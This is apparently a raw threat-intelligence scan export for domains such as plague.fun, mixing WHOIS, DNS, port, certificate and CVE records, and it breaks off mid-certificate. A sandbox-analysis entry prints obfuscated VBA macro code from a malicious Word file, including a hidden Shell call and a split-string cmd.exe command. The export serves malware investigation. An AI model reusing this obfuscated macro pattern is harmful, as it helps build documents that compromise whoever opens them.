HackerTarget 0 0 2 0 None anininfio.ml 172.67.147.230 2022-12-18 00:04:30 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None
"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0968E258-16C7-4DBA-AA86-462DD61E31A3}\\PROGID")\n "WINWORD.EXE" touched "XML Schema Cache 6.0" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{88D96A07-F192-11D4-A65F-0040963251E5}\\TREATAS")\n "WINWORD.EXE" touched "Security Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Vorlage mit Makros" (Path: "HKCU\\CLSID\\{8A624388-AA27-43E0-89F8-2A12BFF7BCCD}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "WINWORD.EXE" touched "Microsoft Word-Dokument" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F4754C9B-64F5-4B40-8AF4-679732AC0607}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Dokument mit Makros" (Path: "HKCU\\CLSID\\{18A06B6B-2F3F-4E2B-A611-52BE631B2D22}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Vorlage" (Path: "HKCU\\CLSID\\{912ABC52-36E2-4714-8E62-A8B73CA5E390}\\INPROCHANDLER32")\n "WINWORD.EXE" touched "Microsoft Word-Vorschau" (Path: "HKCU\\CLSID\\{84F66100-FF7C-4FB4-B0C0-02CD7FB668FE}\\TREATAS")\n "WINWORD.EXE" touched "OpenDocument-Text" (Path: "HKCU\\CLSID\\{1B261B22-AC6A-4E68-A870-AB5080E8687B}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word Picture" (Path: "HKCU\\CLSID\\{00020907-0000-0000-C000-000000000046}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Forms 2.1 FormPackage" (Path: "HKCU\\CLSID\\{AC9F2F90-E877-11CE-9F68-00AA00574A4F}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Forms 2.0 Form" (Path: "HKCU\\CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\MISCSTATUS")\n "WINWORD.EXE" touched "Microsoft Forms 2.1 DataObject" (Path: "HKCU\\CLSID\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\\CONTROL")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-13', u'name': u'Contains embedded VBA macros', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1204', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1204', u'relevance': 10, u'threat_level': 0, u'type': 0, 
u'description': u'File "dnfkdwl.cls" (Streampath: "VBA/dnfkdwl") has code: ""\n File "jwrhja.bas" (Streampath: "VBA/jwrhja") has code: "Function jvnzrf(htwpzwn)\nOn Error Resume Next\n Set mvdzl = cnnujfm\n If bfjidj <= 984169147 Then\n jnpiu = shozs * Sin(lhnofa) - zoczfl - CInt(dvductf + Rnd(750288296) + 733282163 + CDbl(270598878))\n wwbrso = 901182209\nEnd If\n Set rupbwr = ubrrom\n If lrbviwt <= 247806007 Then\n jrila = blbbpaz * Sin(mimbfz) - frzrju - CInt(zwlmhi + Rnd(30319884) + 550356392 + CDbl(772917406))\n wqvqi = 878982855\nEnd If\n Set caiuw = mtnmous\n If fzcal <= 424122488 Then\n wjzsvt = ojcqin * Sin(jrkot) - cvjztkw - CInt(oswpacr + Rnd(9801994) + 755224579 + CDbl(922669759))\n qtzsku = 795259790\nEnd If\njvnzrf = jvnzrf(Shell(htwpzwn, vbHide))\n Set lihlvtc = tviil\n If ndrdk <= 898898037 Then\n mntzn = incjrda * Sin(wpnwh) - bwciv - CInt(inmjzh + Rnd(978309681) + 123674700 + CDbl(949248428))\n rufcfdm = 341333385\nEnd If\n Set zwiuiak = hrurauv\n If uafuums <= 510973469 Then\n mpjkt = nbkwz * Sin(cdhdv) - acsijo - CInt(vcvrj + Rnd(425700337) + 205679951 + CDbl(20902840))\n owhtm = 50944742\nEnd If\n Set lwfjc = cpnskl\n If mzfrmij <= 577115389 Then\n dfnozlr = kpzvlhd * Sin(jpqcl) - qfpozf - CInt(pzrcn + Rnd(675046568) + 71254862 + CDbl(32066302))\n lboiukj = 921174495\nEnd If\nEnd Function\n\nFunction qkdluw()\nOn Error Resume Next\nSet zdcpwns = juvqz\n If jjllf <= 288438056 Then\n bdcmw = jnsjsui * Sin(midciz) - jcwidi - CInt(hznvkjh + Rnd(211582886) + 699380710 + CDbl(409996312))\n rdkwtcz = 19880776\nEnd If\n Set dwdtdf = ozzdi\n If fwmawsk <= 28739917 Then\n lwbpm = lcuqwp * Sin(dwuwww) - owjkdtw - CInt(zmrijnb + Rnd(636363874) + 287534293 + CDbl(707071004))\n iihzru = 771232272\nEnd If\n Set iraiw = jwncbhm\n If iwzjahr <= 918261739 Then\n mucldwi = uwtju * Sin(outunjs) - jmidzz - CInt(wmzdmkd + Rnd(874226755) + 488467751 + CDbl(260432624))\n ksfjfsw = 155159090\nEnd If\nbuvtm = "c:\\" + "ikadf" + "\\jsp" + "twzm\\n" + "njrbn"\nSet qcfis = 
wduaail\n If bfbaovj <= 334621417 Then\n nrkacb = aplsd * Sin(cfpzkff) - wfdpsu - CInt(uhramds + Rnd(941642071) + 718154558 + CDbl(235178107))\n mjbij = 461392357\nEnd If\n Set hnvnt = jmirqt\n If cbpcit <= 680592914 Then\n ccwrcqf = wnvkq * Sin(kvzua) - zptcu - CInt(mpwzl + Rnd(641556529) + 471091423 + CDbl(671754199))\n ckowpor = 415874602\nEnd If\nzuvwtbb = "\\..\\.." + "\\..\\w" + "ind" + "ows\\" + "system" + "32\\c"\nSet izzsz = utiudzo\n If ddzub <= 658807120 Then\n smwmhf = dwqsrr * Sin(lzfksn) - qdjziz - CInt(wjanij + Rnd(480032545) + 523859952 + CDbl(892641091))\n zwwol = 517232310\nEnd If\n Set cdukcht = rscsc\n If dbrwuld <= 822503878 Then\n pcadz = srmczz * Sin(lfqdp) - trjhcd - CInt(azausr + Rnd(724727335) + 959717756 + CDbl(751954319))\n zkcwdi = 427059424\nEnd If\n Set quibwh = pmtuiso\n If zdtpzv <= 812322959 Then\n ijftw = paawbub * Sin(zulzjp) - qiwru - CInt(jsvcjuw + Rnd(637606491) + 646801169 + CDbl(928496469))\n nwlfcni = 69285864\nEnd If\nrpnzcn = "md.exe" + " /c " + "%Pr" + "ogram" + "Data:" + "~0\n" + "1%%Pr" + "ogr" + "amData"\nSet zkmzis = bukjuh\n If hcozbd <= 892525818 Then\n bocjziw = vswuo * Sin(ramtj) - ufbtdho - CInt(widiaj + Rnd(60827869) + 440519123 + CDbl(549515986))\n liknnz = 595594226\nEnd If\n Set iadli = krwal\n If jjnpmk <= 132110158 Then\n ocoivi = jzhmn * Sin(jjmriav) - ttniwjw - CInt(lojup + Rnd(332257574) + 248510662 + CDbl(287255140))\n mowwjs = 220473018\nEnd If\ntosirp = ":~9\n" + "2% /" + "V:ON/C" + Chr(34) + "set " + "cGY=" + "T-Ksj" + ".O:S m" + "bMD~w" + "Uoyh("\nSet zbjmwi = kuinhz\n 104.21.28.240 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b2d44e1e0c226d-ORD 188.114.96.1 2022-12-18 00:21:20 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T16:59:24.849Z", "ip": "188.114.97.1", "location_updated_at": "2022-12-14T09:57:27.738993Z", 
"autonomous_system_updated_at": "2022-12-14T09:57:27.793788Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "dns": {"records": {"clinic.tanyar.org": {"record_type": "A", "resolved_at": "2022-11-26T16:50:32.874480339Z"}, "landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2022-12-11T16:38:30.519896601Z"}, "stafferty.lt": {"record_type": "A", "resolved_at": "2022-11-13T15:02:07.210831297Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2022-12-15T14:10:37.643603413Z"}, "stafferty.lv": {"record_type": "A", "resolved_at": "2022-11-12T15:01:01.637935320Z"}, "question-orthographe.net": {"record_type": "A", "resolved_at": "2022-11-24T15:56:30.103157098Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "www.alvandcenter.com": {"record_type": "A", "resolved_at": "2022-11-07T12:46:16.283141371Z"}, "www.les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-12T13:36:36.298008873Z"}, "en.jahanbaygan.com": {"record_type": "A", "resolved_at": "2022-12-02T13:39:13.675188752Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2022-12-10T14:42:29.167562533Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2022-12-09T13:31:11.160975798Z"}, 
"pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "www.irancamping.com": {"record_type": "A", "resolved_at": "2022-10-13T13:47:56.298914617Z"}, "emberstreet.rocks": {"record_type": "A", "resolved_at": "2022-12-14T09:10:28.120965319Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2022-12-04T13:09:58.172835970Z"}, "irancamping.com": {"record_type": "A", "resolved_at": "2022-10-07T10:43:58.475530009Z"}, "les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-11T03:19:20.280901310Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2022-11-20T12:28:51.523273907Z"}, "www.oxinpc.ir": {"record_type": "A", "resolved_at": "2022-10-09T15:06:46.974209710Z"}, "centrumpedikury.sk": {"record_type": "A", "resolved_at": "2022-10-02T16:33:19.851015297Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2022-11-23T20:29:39.482548225Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2022-12-16T13:31:07.910550851Z"}, "compete.pics": {"record_type": "A", "resolved_at": "2022-12-02T17:07:09.124392306Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2022-11-30T15:41:49.088773411Z"}, "ftp.netrobotic.ir": {"record_type": "A", 
"resolved_at": "2022-12-13T15:24:16.343558814Z"}, "faryabkhabar.ir": {"record_type": "A", "resolved_at": "2022-11-13T14:44:04.633074370Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2022-12-11T13:54:10.566859411Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "e-rundev.ir": {"record_type": "A", "resolved_at": "2022-11-28T15:05:14.014491568Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2022-11-17T12:04:42.803798834Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}}, "names": ["www.clinic.tanyar.org", "demo.jamalghamari.com", "beautybeyondhair.buzz", "api.snoor.shop", "mail.mardinscarf.com", "mail.lskala.com", "assistant.amirhsvip.ir", "www.sanayepishro.com", "mail.wolny.poker", "compete.pics", "pop.makingprojec.com", "en.jahanbaygan.com", "les1000volets.com", "megafrica.ao", "www.oxinpc.ir", "emberstreet.rocks", "total-ev-charge.com", "dl.jamalghamari.com", "lt.makingprojec.com", "irancamping.com", "stafferty.lv", "www.wolny.poker", "barbecue-masters.dk", "stafferty.lt", "www.shop.charkhak.ir", "barbecuemasters.dk", "question-orthographe.net", "smtp.sharoshop.com", "ftp.netrobotic.ir", "edu.rabinia.com", "ritta.app", "ftp.baharelm.ir", "landing.makingprojec.com", "www.irancamping.com", "wolny.poker", "e-rundev.ir", "beautybeyondhair.net", "uncoveryourconfidence.org", "mybots.amirhsvip.ir", "www.les1000volets.com", "faryabkhabar.ir", "centrumpedikury.sk", "www.barbecue-masters.dk", "www.barbecuemasters.dk", "clinic.tanyar.org", "www.alvandcenter.com", "mail.bokharsanat.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", 
"Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://188.114.97.1/"}, "response": {"body": "Direct IP access not allowed | Cloudflare Please enable cookies. Error 1003 Ray ID: 77b12f173862f22a • 2022-12-17 16:55:00 UTC Direct IP access not allowed What happened? You've requested an IP address that is part of the Cloudflare network. A valid Host header must be supplied to reach the desired website. What can I do? If you are interested in learning more about Cloudflare, please visit our website.
>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. 
Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. 
We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:18:03 Web Technology No Tool - WhatWeb 0 0 2 0 None JQuery webmail.zerotwo-best-waifu.online 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2082 188.114.96.0 2022-12-18 00:12:42 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 104.21.27.242 2022-12-18 00:06:06 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None raspu.tain.fr rasputain.fr 2022-12-18 00:09:32 Co-Hosted Site No HackerTarget 0 0 2 0 None cogigang.com 104.21.28.240 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None turbofeistyintelligence.provhvfvqqho.repl.co 34.149.204.188 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.97.9 2022-12-18 00:23:32 Affiliate - Internet Name No DNS Raw Records 1 0 2 0 None smtp-fr.securemail.pro smtp.zerotwo-best-waifu.online 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": 
["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:32:28 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.tools Registry Domain ID: ecc23f6039fd437480662da9344894d6-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-02-13T11:50:45Z Creation Date: 2022-02-08T11:50:07Z Registry Expiry Date: 2023-02-08T11:50:07Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:17Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. 
Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. 
reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Socket not responding: timed out 2022-12-18 00:20:42 Physical Location No Censys 0 0 1 0 None Campinas, Sao Paulo, Brazil, South America 4.228.83.86 2022-12-18 00:18:25 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.10:80 188.114.97.0/24 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:8443 104.21.19.243 2022-12-18 00:24:58 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.188 90.116.149.183 2022-12-18 00:02:45 SSL Certificate Expiring Yes CertSpotter 0 0 1 0 None 2022-12-19 21:18:05 misogyny.wtf 2022-12-18 00:08:52 Open TCP Port No LeakIX 0 0 2 0 None 104.21.28.240:443 104.21.28.240 2022-12-18 00:06:40 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:06:19 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.cx plague.fun 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None brasfaberk.ga 172.67.147.230 2022-12-18 00:22:04 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Te": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8"}, "Te": ["chunked"], "Content_Type": ["text/html"]} 90.116.166.104 2022-12-18 00:06:06 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None amenworld.com ns2.amenworld.com 2022-12-18 00:09:46 Co-Hosted Site No HackerTarget 0 0 2 0 None assets.auroramediagroup.xyz 172.67.147.230 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None grasshopper2 (Net ID: 00:01:38:5A:88:28) 37.780462,-122.390564 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 104.21.7.179 2022-12-18 00:09:48 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2016-2183 https://nvd.nist.gov/vuln/detail/CVE-2016-2183 Score: 5.0 Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of 
approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. 188.114.96.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinenewbankbcp.viiabcp.repl.co 34.149.204.188 2022-12-18 00:21:37 Software Used Yes Censys 0 0 2 0 None PalletsProjects Werkzeug 2.2.2 20.226.83.185 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77ade072690313ce-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.147.230 2022-12-18 00:21:44 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3031::6815:7b3:80 2606:4700:3031::6815:7b3 2022-12-18 00:03:03 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:5f:2b:c4:e2:52:ac:ba:5b:55:25:2b:3c:57:78:0c:6b:4f Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Apr 9 16:42:21 2022 GMT Not After : Jul 8 16:42:20 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:f0:74:08:94:b1:0e:3a:f5:ab:5d:27:9f:a1:13: 26:4a:b8:88:b4:cd:16:65:28:29:5d:0c:65:22:96: 16:e9:20:24:42:3d:6d:35:0e:c1:28:8c:4a:28:75: 
c3:5b:63:81:00:5f:79:35:b2:8c:de:87:22:b0:ad: a6:67:62:40:d8:17:58:b3:75:0e:b6:2f:73:f2:ea: eb:e0:8f:76:26:50:9a:16:11:75:b8:95:2c:97:e5: b9:e5:63:e7:51:d3:eb:e7:99:34:6a:cf:cc:fb:cf: db:aa:47:5b:d5:56:1a:8d:93:2c:fd:ff:26:75:37: d0:62:e4:63:b7:38:a8:b2:e3:d7:82:92:52:ce:b0: af:e9:42:c7:ca:4f:21:55:20:92:35:54:9c:65:7a: ce:69:96:a3:18:10:90:ac:b1:94:6c:06:cb:1d:e6: f3:8c:63:be:4d:c3:b6:5c:e7:73:eb:aa:34:c4:16: b2:55:9f:e1:5e:c9:6e:3c:a6:a1:4e:ce:ba:1c:93: 9b:8f:97:87:77:b0:cc:86:0e:ec:a3:31:e9:6a:17: 0a:2c:ea:72:83:72:e9:ad:a4:a9:77:f3:4c:21:11: 4e:be:f0:d4:f6:9c:70:8a:00:15:78:65:11:81:45: 14:10:49:bf:49:44:94:90:4c:18:e2:6e:b5:c1:88: 5e:37 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: C9:18:99:93:EB:0E:8F:DB:EF:08:28:03:69:26:F5:7B:25:61:0A:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject 